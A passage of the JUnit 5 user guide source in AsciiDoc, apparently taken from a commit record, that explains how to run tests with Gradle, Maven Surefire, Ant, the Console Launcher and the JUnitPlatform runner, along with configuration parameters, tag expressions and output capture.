`TestEngine` implementation must be on the classpath.\n\nTo configure support for JUnit Jupiter based tests, configure a `testCompile` dependency\non the JUnit Jupiter API and a `testRuntime` dependency on the JUnit Jupiter `TestEngine`\nimplementation similar to the following.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ndependencies {\n\ttestCompile(\"org.junit.jupiter:junit-jupiter-api:{jupiter-version}\")\n\ttestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\n}\n----\n\nThe JUnit Platform can run JUnit 4 based tests as long as you configure a `testCompile`\ndependency on JUnit 4 and a `testRuntime` dependency on the JUnit Vintage `TestEngine`\nimplementation similar to the following.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ndependencies {\n\ttestCompile(\"junit:junit:{junit4-version}\")\n\ttestRuntime(\"org.junit.vintage:junit-vintage-engine:{vintage-version}\")\n}\n----\n\n[[running-tests-build-gradle-logging]]\n===== Configuring Logging (optional)\n\nJUnit uses the Java Logging APIs in the `java.util.logging` package (a.k.a. _JUL_) to\nemit warnings and debug information. Please refer to the official documentation of\n`{LogManager}` for configuration options.\n\nAlternatively, it's possible to redirect log messages to other logging frameworks such as\n{Log4j} or {Logback}. To use a logging framework that provides a custom implementation of\n`{LogManager}`, set the `java.util.logging.manager` system property to the _fully\nqualified class name_ of the `{LogManager}` implementation to use. 
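When the JVM is launched directly, this can be done by passing a plain system property on the command line; the following sketch assumes the Log4j JUL adapter (the `log4j-jul` artifact) is on the runtime classpath.\n\n[source,console]\n----\n$ java -Djava.util.logging.manager=org.apache.logging.log4j.jul.LogManager ...\n----\n\n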
The example below\ndemonstrates how to configure Log4j{nbsp}2.x (see {Log4j_JDK_Logging_Adapter} for\ndetails).\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n\tsystemProperty 'java.util.logging.manager', 'org.apache.logging.log4j.jul.LogManager'\n}\n----\n\nOther logging frameworks provide different means to redirect messages logged using\n`java.util.logging`. For example, for {Logback} you can use the\nhttps:\/\/www.slf4j.org\/legacy.html#jul-to-slf4j[JUL to SLF4J Bridge] by adding an\nadditional dependency to the runtime classpath.\n\n[[running-tests-build-maven]]\n==== Maven\n\nNOTE: The custom `junit-platform-surefire-provider`, which was originally developed by\nthe JUnit team, has been deprecated and is scheduled to be removed in JUnit Platform\n1.4. Please use Maven Surefire's native support instead.\n\nStarting with https:\/\/issues.apache.org\/jira\/browse\/SUREFIRE-1330[version 2.22.0],\nMaven Surefire provides\nhttp:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/junit-platform.html[native support]\nfor executing tests on the JUnit Platform. The `pom.xml` file in the\n`{junit5-jupiter-starter-maven}` project demonstrates how to use it and can serve as a\nstarting point for configuring your Maven build.\n\n[[running-tests-build-maven-engines-configure]]\n===== Configuring Test Engines\n\nIn order to have Maven Surefire run any tests at all, at least one `TestEngine`\nimplementation must be added to the test classpath.\n\nTo configure support for JUnit Jupiter based tests, configure a `test` dependency on the\nJUnit Jupiter API and the JUnit Jupiter `TestEngine` implementation.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>org.junit.jupiter<\/groupId>\n\t\t\t<artifactId>junit-jupiter-api<\/artifactId>\n\t\t\t<version>{jupiter-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.junit.jupiter<\/groupId>\n\t\t\t<artifactId>junit-jupiter-engine<\/artifactId>\n\t\t\t<version>{jupiter-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t\t...\n\t<\/dependencies>\n\t...\n----\n\nMaven Surefire can run JUnit 4 based tests alongside Jupiter tests as long as you\nconfigure a `test` dependency on JUnit 4 and the JUnit Vintage `TestEngine`\nimplementation similar to the following.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>junit<\/groupId>\n\t\t\t<artifactId>junit<\/artifactId>\n\t\t\t<version>{junit4-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.junit.vintage<\/groupId>\n\t\t\t<artifactId>junit-vintage-engine<\/artifactId>\n\t\t\t<version>{vintage-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t\t...\n\t<\/dependencies>\n\t...\n----\n\n[[running-tests-build-maven-filter-test-class-names]]\n===== Filtering by Test Class Names\n\nThe Maven Surefire Plugin will scan for test classes whose fully qualified names match\nthe following patterns.\n\n- `+**\/Test*.java+`\n- 
`+**\/*Test.java+`\n- `+**\/*Tests.java+`\n- `+**\/*TestCase.java+`\n\nMoreover, it will exclude all nested classes (including static member classes) by default.\n\nNote, however, that you can override this default behavior by configuring explicit\n`include` and `exclude` rules in your `pom.xml` file. For example, to keep Maven Surefire\nfrom excluding static member classes, you can override its exclude rules.\n\n[source,xml,indent=0]\n[subs=attributes+]\n.Overriding exclude rules of Maven Surefire\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<excludes>\n\t\t\t\t\t\t<exclude\/>\n\t\t\t\t\t<\/excludes>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\nPlease see the\nhttps:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/inclusion-exclusion.html[Inclusions and Exclusions of Tests]\ndocumentation for Maven Surefire for details.\n\n[[running-tests-build-maven-filter-tags]]\n===== Filtering by Tags\n\nYou can filter tests by tags or <<running-tests-tag-expressions, tag expressions>> using\nthe following configuration properties.\n\n- to include _tags_ or _tag expressions_, use `groups`.\n- to exclude _tags_ or _tag expressions_, use `excludedGroups`.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<groups>acceptance | !feature-a<\/groups>\n\t\t\t\t\t<excludedGroups>integration, regression<\/excludedGroups>\n\t\t\t <\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-maven-config-params]]\n===== Configuration Parameters\n\nYou can set JUnit Platform <<running-tests-config-params, configuration parameters>> to\ninfluence test discovery and execution by declaring the `configurationParameters`\nproperty and providing key-value pairs using the Java `Properties` file syntax (as shown\nbelow) or via the `junit-platform.properties` file.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<properties>\n\t\t\t\t\t\t<configurationParameters>\n\t\t\t\t\t\t\tjunit.jupiter.conditions.deactivate = *\n\t\t\t\t\t\t\tjunit.jupiter.extensions.autodetection.enabled = true\n\t\t\t\t\t\t\tjunit.jupiter.testinstance.lifecycle.default = per_class\n\t\t\t\t\t\t<\/configurationParameters>\n\t\t\t\t\t<\/properties>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-ant]]\n==== Ant\n\nStarting with version `1.10.3` of link:https:\/\/ant.apache.org\/[Ant], a new\nlink:https:\/\/ant.apache.org\/manual\/Tasks\/junitlauncher.html[`junitlauncher`] task has\nbeen introduced to provide native support for launching tests on the JUnit Platform. The\n`junitlauncher` task is solely responsible for launching the JUnit Platform and passing\nit the selected collection of tests. 
The JUnit Platform then delegates to registered test\nengines to discover and execute the tests.\n\nThe `junitlauncher` task attempts to align as close as possible with native Ant\nconstructs such as\nlink:https:\/\/ant.apache.org\/manual\/Types\/resources.html#collection[resource collections]\nfor allowing users to select the tests that they want executed by test engines. This\ngives the task a consistent and natural feel when compared to many other core Ant tasks.\n\nNOTE: The version of the `junitlauncher` task shipped in Ant 1.10.3 provides basic,\nminimal support for launching the JUnit Platform. Additional enhancements (including\nsupport for forking the tests in a separate JVM) will be available in subsequent releases\nof Ant.\n\nThe `build.xml` file in the `{junit5-jupiter-starter-ant}` project demonstrates how to use\nit and can serve as a starting point.\n\n===== Basic Usage\n\nThe following example demonstrates how to configure the `junitlauncher` task to select a\nsingle test class (i.e., `org.myapp.test.MyFirstJUnit5Test`).\n\n[source,xml,indent=0]\n----\n\t<path id=\"test.classpath\">\n\t\t<!-- The location where you have your compiled classes -->\n\t\t<pathelement location=\"${build.classes.dir}\" \/>\n\t<\/path>\n\n\t<!-- ... -->\n\n\t<junitlauncher>\n\t\t<classpath refid=\"test.classpath\" \/>\n\t\t<test name=\"org.myapp.test.MyFirstJUnit5Test\" \/>\n\t<\/junitlauncher>\n----\n\nThe `test` element allows you to specify a single test class that you want to be selected\nand executed. The `classpath` element allows you to specify the classpath to be used to\nlaunch the JUnit Platform. This classpath will also be used to locate test classes that\nare part of the execution.\n\nThe following example demonstrates how to configure the `junitlauncher` task to select\ntest classes from multiple locations.\n\n[source,xml,indent=0]\n----\n\t<path id=\"test.classpath\">\n\t\t<!-- The location where you have your compiled classes -->\n\t\t<pathelement location=\"${build.classes.dir}\" \/>\n\t<\/path>\n\t....\n\t<junitlauncher>\n\t\t<classpath refid=\"test.classpath\" \/>\n\t\t<testclasses outputdir=\"${output.dir}\">\n\t\t\t<fileset dir=\"${build.classes.dir}\">\n\t\t\t\t<include name=\"org\/example\/**\/demo\/**\/\" \/>\n\t\t\t<\/fileset>\n\t\t\t<fileset dir=\"${some.other.dir}\">\n\t\t\t\t<include name=\"org\/myapp\/**\/\" \/>\n\t\t\t<\/fileset>\n\t\t<\/testclasses>\n\t<\/junitlauncher>\n----\n\nIn the above example, the `testclasses` element allows you to select multiple test\nclasses that reside in different locations.\n\nFor further details on usage and configuration options please refer to the official Ant\ndocumentation for the\nlink:https:\/\/ant.apache.org\/manual\/Tasks\/junitlauncher.html[`junitlauncher` task].\n\n[[running-tests-console-launcher]]\n=== Console Launcher\n\nThe `{ConsoleLauncher}` is a command-line Java application that lets you launch the JUnit\nPlatform from the console. For example, it can be used to run JUnit Vintage and JUnit\nJupiter tests and print test execution results to the console.\n\nAn executable `junit-platform-console-standalone-{platform-version}.jar` with all\ndependencies included is published in the central Maven repository under the\nhttps:\/\/repo1.maven.org\/maven2\/org\/junit\/platform\/junit-platform-console-standalone[junit-platform-console-standalone]\ndirectory. 
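For instance, a typical invocation that discovers tests by scanning a directory of compiled classes might look like the following sketch, in which the class-path entry is a placeholder for your own build output.\n\n[source,console]\n----\n$ java -jar junit-platform-console-standalone-{platform-version}.jar --class-path build\/classes\/java\/test --scan-class-path\n----\n\n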
You can https:\/\/docs.oracle.com\/javase\/tutorial\/deployment\/jar\/run.html[run] the\nstandalone `ConsoleLauncher` as shown below.\n\n`java -jar junit-platform-console-standalone-{platform-version}.jar <<<running-tests-console-launcher-options>>>`\n\nHere's an example of its output:\n\n....\n\u251c\u2500 JUnit Vintage\n\u2502 \u2514\u2500 example.JUnit4Tests\n\u2502 \u2514\u2500 standardJUnit4Test \u2714\n\u2514\u2500 JUnit Jupiter\n \u251c\u2500 StandardTests\n \u2502 \u251c\u2500 succeedingTest() \u2714\n \u2502 \u2514\u2500 skippedTest() \u21b7 for demonstration purposes\n \u2514\u2500 A special test case\n \u251c\u2500 Custom test name containing spaces \u2714\n \u251c\u2500 \u256f\u00b0\u25a1\u00b0\uff09\u256f \u2714\n \u2514\u2500 \ud83d\ude31 \u2714\n\nTest run finished after 64 ms\n[ 5 containers found ]\n[ 0 containers skipped ]\n[ 5 containers started ]\n[ 0 containers aborted ]\n[ 5 containers successful ]\n[ 0 containers failed ]\n[ 6 tests found ]\n[ 1 tests skipped ]\n[ 5 tests started ]\n[ 0 tests aborted ]\n[ 5 tests successful ]\n[ 0 tests failed ]\n....\n\n.Exit Code\nNOTE: The `{ConsoleLauncher}` exits with a status code of `1` if any containers or tests\nfailed. If no tests are discovered and the `--fail-if-no-tests` command-line option is\nsupplied, the `ConsoleLauncher` exits with a status code of `2`. Otherwise the exit code\nis `0`.\n\n[[running-tests-console-launcher-options]]\n==== Options\n\n----\ninclude::{consoleLauncherOptionsFile}[]\n----\n\n[[running-tests-console-launcher-argument-files]]\n==== Argument Files (@-files)\n\nOn some platforms you may run into system limitations on the length of a command line\nwhen creating a command line with lots of options or with long arguments.\n\nSince version 1.3, the `ConsoleLauncher` supports _argument files_, also known as\n_@-files_. Argument files are files that themselves contain arguments to be passed to the\ncommand. When the underlying https:\/\/github.com\/remkop\/picocli[picocli] command line\nparser encounters an argument beginning with the character `@`, it expands the contents\nof that file into the argument list.\n\nThe arguments within a file can be separated by spaces or newlines. If an argument\ncontains embedded whitespace, the whole argument should be wrapped in double or single\nquotes -- for example, `\"-f=My Files\/Stuff.java\"`.\n\nIf the argument file does not exist or cannot be read, the argument will be treated\nliterally and will not be removed. This will likely result in an \"unmatched argument\"\nerror message. You can troubleshoot such errors by executing the command with the\n`picocli.trace` system property set to `DEBUG`.\n\nMultiple _@-files_ may be specified on the command line. The specified path may be\nrelative to the current directory or absolute.\n\nYou can pass a real parameter with an initial `@` character by escaping it with an\nadditional `@` symbol. 
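To make the mechanism concrete, the sketch below shows a hypothetical argument file named `console-args.txt` and an invocation that expands it; the options listed in the file are merely examples.\n\n[source,console]\n----\n$ cat console-args.txt\n--class-path=build\/classes\/java\/test\n--scan-class-path\n--details=tree\n$ java -jar junit-platform-console-standalone-{platform-version}.jar @console-args.txt\n----\n\nAs noted above, an initial `@` can be escaped by doubling it. 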
For example, `@@somearg` will become `@somearg` and will not be\nsubject to expansion.\n\n\n[[running-tests-junit-platform-runner]]\n=== Using JUnit 4 to run the JUnit Platform\n\nThe `JUnitPlatform` runner is a JUnit 4 based `Runner` which enables you to run any test\nwhose programming model is supported on the JUnit Platform in a JUnit 4 environment --\nfor example, a JUnit Jupiter test class.\n\nAnnotating a class with `@RunWith(JUnitPlatform.class)` allows it to be run with IDEs and\nbuild systems that support JUnit 4 but do not yet support the JUnit Platform directly.\n\nNOTE: Since the JUnit Platform has features that JUnit 4 does not have, the runner is\nonly able to support a subset of the JUnit Platform functionality, especially with regard\nto reporting (see <<running-tests-junit-platform-runner-technical-names>>). But for the\ntime being the `JUnitPlatform` runner is an easy way to get started.\n\n[[running-tests-junit-platform-runner-setup]]\n==== Setup\n\nYou need the following artifacts and their dependencies on the classpath. See\n<<dependency-metadata>> for details regarding group IDs, artifact IDs, and versions.\n\n===== Explicit Dependencies\n\n* `junit-platform-runner` in _test_ scope: location of the `JUnitPlatform` runner\n* `junit-{junit4-version}.jar` in _test_ scope: to run tests using JUnit 4\n* `junit-jupiter-api` in _test_ scope: API for writing tests using JUnit Jupiter, including `@Test`, etc.\n* `junit-jupiter-engine` in _test runtime_ scope: implementation of the `TestEngine` API for JUnit Jupiter\n\n===== Transitive Dependencies\n\n* `junit-platform-suite-api` in _test_ scope\n* `junit-platform-launcher` in _test_ scope\n* `junit-platform-engine` in _test_ scope\n* `junit-platform-commons` in _test_ scope\n* `opentest4j` in _test_ scope\n\n[[running-tests-junit-platform-runner-technical-names]]\n==== Display Names vs. Technical Names\n\nTo define a custom _display name_ for the class run via `@RunWith(JUnitPlatform.class)`\nsimply annotate the class with `@SuiteDisplayName` and provide a custom value.\n\nBy default, _display names_ will be used for test artifacts; however, when the\n`JUnitPlatform` runner is used to execute tests with a build tool such as Gradle or\nMaven, the generated test report often needs to include the _technical names_ of test\nartifacts \u2014 for example, fully qualified class names \u2014 instead of shorter display names\nlike the simple name of a test class or a custom display name containing special\ncharacters. To enable technical names for reporting purposes, simply declare the\n`@UseTechnicalNames` annotation alongside `@RunWith(JUnitPlatform.class)`.\n\nNote that the presence of `@UseTechnicalNames` overrides any custom display name\nconfigured via `@SuiteDisplayName`.\n\n[[running-tests-junit-platform-runner-single-test]]\n==== Single Test Class\n\nOne way to use the `JUnitPlatform` runner is to annotate a test class with\n`@RunWith(JUnitPlatform.class)` directly. Please note that the test methods in the\nfollowing example are annotated with `org.junit.jupiter.api.Test` (JUnit Jupiter), not\n`org.junit.Test` (JUnit Vintage). 
Moreover, in this case the test class must be `public`;\notherwise, some IDEs and build tools might not recognize it as a JUnit 4 test class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/JUnit4ClassDemo.java[tags=user_guide]\n----\n\n[[running-tests-junit-platform-runner-test-suite]]\n==== Test Suite\n\nIf you have multiple test classes you can create a test suite as can be seen in the\nfollowing example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/JUnit4SuiteDemo.java[tags=user_guide]\n----\n\nThe `JUnit4SuiteDemo` will discover and run all tests in the `example` package\nand its subpackages. By default, it will only include test classes whose names\neither begin with `Test` or end with `Test` or `Tests`.\n\n.Additional Configuration Options\nNOTE: There are more configuration options for discovering and filtering tests than just\n`@SelectPackages`. Please consult the\n{javadoc-root}\/org\/junit\/platform\/suite\/api\/package-summary.html[Javadoc] for further\ndetails.\n\n[[running-tests-config-params]]\n=== Configuration Parameters\n\nIn addition to instructing the platform which test classes and test engines to include,\nwhich packages to scan, etc., it is sometimes necessary to provide additional custom\nconfiguration parameters that are specific to a particular test engine or registered\nextension. For example, the JUnit Jupiter `TestEngine` supports _configuration\nparameters_ for the following use cases.\n\n- <<writing-tests-test-instance-lifecycle-changing-default>>\n- <<extensions-registration-automatic-enabling>>\n- <<extensions-conditions-deactivation>>\n\n_Configuration Parameters_ are text-based key-value pairs that can be supplied to test\nengines running on the JUnit Platform via one of the following mechanisms.\n\n1. The `configurationParameter()` and `configurationParameters()` methods in the\n `LauncherDiscoveryRequestBuilder` which is used to build a request supplied to the\n <<launcher-api, `Launcher` API>>. When running tests via one of the tools provided\n by the JUnit Platform you can specify configuration parameters as follows:\n * <<running-tests-console-launcher,Console Launcher>>: use the `--config`\n command-line option.\n * <<running-tests-build-gradle-config-params,Gradle>>: use the\n `systemProperty` or `systemProperties` DSL.\n * <<running-tests-build-maven-config-params,Maven Surefire provider>>: use the\n `configurationParameters` property.\n2. JVM system properties.\n3. The JUnit Platform configuration file: a file named `junit-platform.properties` in the\n root of the class path that follows the syntax rules for a Java `Properties` file.\n\nNOTE: Configuration parameters are looked up in the exact order defined above.\nConsequently, configuration parameters supplied directly to the `Launcher` take\nprecedence over those supplied via system properties and the configuration file.\nSimilarly, configuration parameters supplied via system properties take precedence over\nthose supplied via the configuration file.\n\n[[running-tests-tag-expressions]]\n=== Tag Expressions\nTag expressions are boolean expressions with the operators `!`, `&` and `|`. In addition,\n`(` and `)` can be used to adjust for operator precedence.\n\n.Operators (in descending order of precedence)\n|===\n| Operator | Meaning | Associativity\n\n| `!` | not | right\n| `&` | and | left\n| `\\|` | or | left\n|===\n\nIf you are tagging your tests across multiple dimensions, tag expressions help you to\nselect which tests to execute. Tagging by test type (e.g. 
_micro_, _integration_,\n_end-to-end_) and feature (e.g. *foo*, *bar*, *baz*) the following tag expressions can be\nuseful.\n\n[%header,cols=\"40,60\"]\n|===\n| Tag Expression\n| Selection\n\n| +foo+\n| all tests for *foo*\n\n| +bar \\| baz+\n| all tests for *bar* plus all tests for *baz*\n\n| +bar & baz+\n| all tests for the intersection between *bar* and *baz*\n\n| +foo & !end-to-end+\n| all tests for *foo*, but not the _end-to-end_ tests\n\n| +(micro \\| integration) & (foo \\| baz)+\n| all _micro_ or _integration_ tests for *foo* or *baz*\n|===\n\n[[running-tests-capturing-output]]\n=== Capturing Standard Output\/Error\n\nSince version 1.3, the JUnit Platform provides opt-in support for capturing output\nprinted to `System.out` and `System.err`. To enable it, simply set the\n`junit.platform.output.capture.stdout` and\/or `junit.platform.output.capture.stderr`\n<<running-tests-config-params, configuration parameter>> to `true`. In addition, you may\nconfigure the maximum number of buffered bytes to be used per executed test or container\nusing `junit.platform.output.capture.maxBuffer`.\n\nIf enabled, the JUnit Platform captures the corresponding output and publishes it as a\nreport entry using the `stdout` or `stderr` keys to all registered\n`{TestExecutionListener}` instances immediately before reporting the test or container as\nfinished.\n\nPlease note that the captured output will only contain output emitted by the thread that\nwas used to execute a container or test. Any output by other threads will be omitted\nbecause particularly when\n<<writing-tests-parallel-execution, executing tests in parallel>> it would be impossible\nto attribute it to a specific test or container.\n\nWARNING: Capturing output is currently an _experimental_ feature. You're invited to give\nit a try and provide feedback to the JUnit team so they can improve and eventually\n<<api-evolution, promote>> this feature.\n","old_contents":"[[running-tests]]\n== Running Tests\n\n[[running-tests-ide]]\n=== IDE Support\n\n[[running-tests-ide-intellij-idea]]\n==== IntelliJ IDEA\n\nIntelliJ IDEA supports running tests on the JUnit Platform since version 2016.2. For\ndetails please see the\nhttps:\/\/blog.jetbrains.com\/idea\/2016\/08\/using-junit-5-in-intellij-idea\/[post on the\nIntelliJ IDEA blog]. Note, however, that it is recommended to use IDEA 2017.3 or newer\nsince these newer versions of IDEA will download the following JARs automatically based\non the API version used in the project: `junit-platform-launcher`,\n`junit-jupiter-engine`, and `junit-vintage-engine`.\n\nWARNING: IntelliJ IDEA releases prior to IDEA 2017.3 bundle specific versions of JUnit 5.\nThus, if you want to use a newer version of JUnit Jupiter, execution of tests within the\nIDE might fail due to version conflicts. 
In such cases, please follow the instructions\nbelow to use a newer version of JUnit 5 than the one bundled with IntelliJ IDEA.\n\nIn order to use a different JUnit 5 version (e.g., {jupiter-version}), you may need to\ninclude the corresponding versions of the `junit-platform-launcher`,\n`junit-jupiter-engine`, and `junit-vintage-engine` JARs in the classpath.\n\n.Additional Gradle Dependencies\n[source,groovy]\n[subs=attributes+]\n----\n\/\/ Only needed to run tests in a version of IntelliJ IDEA that bundles older versions\ntestRuntime(\"org.junit.platform:junit-platform-launcher:{platform-version}\")\ntestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\ntestRuntime(\"org.junit.vintage:junit-vintage-engine:{vintage-version}\")\n----\n\n.Additional Maven Dependencies\n[source,xml]\n[subs=attributes+]\n----\n<!-- Only needed to run tests in a version of IntelliJ IDEA that bundles older versions -->\n<dependency>\n\t<groupId>org.junit.platform<\/groupId>\n\t<artifactId>junit-platform-launcher<\/artifactId>\n\t<version>{platform-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n<dependency>\n\t<groupId>org.junit.jupiter<\/groupId>\n\t<artifactId>junit-jupiter-engine<\/artifactId>\n\t<version>{jupiter-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n<dependency>\n\t<groupId>org.junit.vintage<\/groupId>\n\t<artifactId>junit-vintage-engine<\/artifactId>\n\t<version>{vintage-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n----\n\n[[running-tests-ide-eclipse]]\n==== Eclipse\n\nEclipse IDE offers support for the JUnit Platform since the Eclipse Oxygen.1a (4.7.1a)\nrelease.\n\nFor more information on using JUnit 5 in Eclipse consult the official _Eclipse support\nfor JUnit 5_ section of the\nhttps:\/\/www.eclipse.org\/eclipse\/news\/4.7.1a\/#junit-5-support[Eclipse Project Oxygen.1a\n(4.7.1a) - New and Noteworthy] documentation.\n\n[[running-tests-ide-other]]\n==== Other IDEs\n\nAt the time of this writing, there is no direct support for running tests on the JUnit\nPlatform within IDEs other than IntelliJ IDEA and Eclipse. However, the JUnit team\nprovides two intermediate solutions so that you can go ahead and try out JUnit 5 within\nyour IDE today. You can use the <<running-tests-console-launcher>> manually or execute\ntests with a <<running-tests-junit-platform-runner,JUnit 4 based Runner>>.\n\n[[running-tests-build]]\n=== Build Support\n\n[[running-tests-build-gradle]]\n==== Gradle\n\nStarting with https:\/\/docs.gradle.org\/4.6\/release-notes.html[version 4.6], Gradle provides\nhttps:\/\/docs.gradle.org\/current\/userguide\/java_testing.html#using_junit5[native support]\nfor executing tests on the JUnit Platform. 
To enable it, you just need to specify\n`useJUnitPlatform()` within a `test` task declaration in `build.gradle`:\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n useJUnitPlatform()\n}\n----\n\nFiltering by tags or engines is also supported:\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n useJUnitPlatform {\n includeTags 'fast', 'smoke & feature-a'\n \/\/ excludeTags 'slow', 'ci'\n includeEngines 'junit-jupiter'\n \/\/ excludeEngines 'junit-vintage'\n\t}\n}\n----\n\nPlease refer to the\nhttps:\/\/docs.gradle.org\/current\/userguide\/java_plugin.html#sec:java_test[official Gradle documentation]\nfor a comprehensive list of options.\n\n[WARNING]\n.The JUnit Platform Gradle Plugin has been discontinued\n====\nThe very basic `junit-platform-gradle-plugin` developed by the JUnit team was deprecated\nin JUnit Platform 1.2 and discontinued in 1.3. Please switch to Gradle's standard `test`\ntask.\n====\n\n[[running-tests-build-gradle-config-params]]\n===== Configuration Parameters\n\nThe standard Gradle `test` task currently does not provide a dedicated DSL to set JUnit\nPlatform <<running-tests-config-params, configuration parameters>> to influence test\ndiscovery and execution. However, you can provide configuration parameters within the\nbuild script via system properties (as shown below) or via the\n`junit-platform.properties` file.\n\n[source,java,indent=0]\n----\ntest {\n\t\/\/ ...\n\tsystemProperty 'junit.jupiter.conditions.deactivate', '*'\n\tsystemProperties = [\n\t\t'junit.jupiter.extensions.autodetection.enabled': 'true',\n\t\t'junit.jupiter.testinstance.lifecycle.default': 'per_class'\n\t]\n\t\/\/ ...\n}\n----\n\n[[running-tests-build-gradle-engines-configure]]\n===== Configuring Test Engines\n\nIn order to run any tests at all, a `TestEngine` implementation must be on the classpath.\n\nTo configure support for JUnit Jupiter based tests, configure a `testCompile` dependency\non the JUnit Jupiter API and a `testRuntime` dependency on the JUnit Jupiter `TestEngine`\nimplementation similar to the following.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ndependencies {\n\ttestCompile(\"org.junit.jupiter:junit-jupiter-api:{jupiter-version}\")\n\ttestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\n}\n----\n\nThe JUnit Platform can run JUnit 4 based tests as long as you configure a `testCompile`\ndependency on JUnit 4 and a `testRuntime` dependency on the JUnit Vintage `TestEngine`\nimplementation similar to the following.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ndependencies {\n\ttestCompile(\"junit:junit:{junit4-version}\")\n\ttestRuntime(\"org.junit.vintage:junit-vintage-engine:{vintage-version}\")\n}\n----\n\n[[running-tests-build-gradle-logging]]\n===== Configuring Logging (optional)\n\nJUnit uses the Java Logging APIs in the `java.util.logging` package (a.k.a. _JUL_) to\nemit warnings and debug information. Please refer to the official documentation of\n`{LogManager}` for configuration options.\n\nAlternatively, it's possible to redirect log messages to other logging frameworks such as\n{Log4j} or {Logback}. To use a logging framework that provides a custom implementation of\n`{LogManager}`, set the `java.util.logging.manager` system property to the _fully\nqualified class name_ of the `{LogManager}` implementation to use. 
The example below\ndemonstrates how to configure Log4j{nbsp}2.x (see {Log4j_JDK_Logging_Adapter} for\ndetails).\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n\tsystemProperty 'java.util.logging.manager', 'org.apache.logging.log4j.jul.LogManager'\n}\n----\n\nOther logging frameworks provide different means to redirect messages logged using\n`java.util.logging`. For example, for {Logback} you can use the\nhttps:\/\/www.slf4j.org\/legacy.html#jul-to-slf4j[JUL to SLF4J Bridge] by adding an\nadditional dependency to the runtime classpath.\n\n[[running-tests-build-maven]]\n==== Maven\n\nNOTE: Starting with https:\/\/issues.apache.org\/jira\/browse\/SUREFIRE-1330[version 2.22.0],\nMaven Surefire provides\nhttp:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/junit-platform.html[native support]\nfor executing tests on the JUnit Platform. The `pom.xml` file in the\n`{junit5-jupiter-starter-maven}` project demonstrates how to use the native support and\ncan serve as a starting point for configuring your Maven build.\n\nThe JUnit team has developed a basic provider for Maven Surefire that lets you run JUnit\n4 and JUnit Jupiter tests via `mvn test` on versions of Maven Surefire prior to 2.22.0.\nDue to the release of Surefire 2.22.0, the `junit-platform-surefire-provider` from the\nJUnit team has been deprecated and will be discontinued in a subsequent release of the\nJUnit Platform.\n\nNOTE: Please use Maven Surefire {surefire-version} with 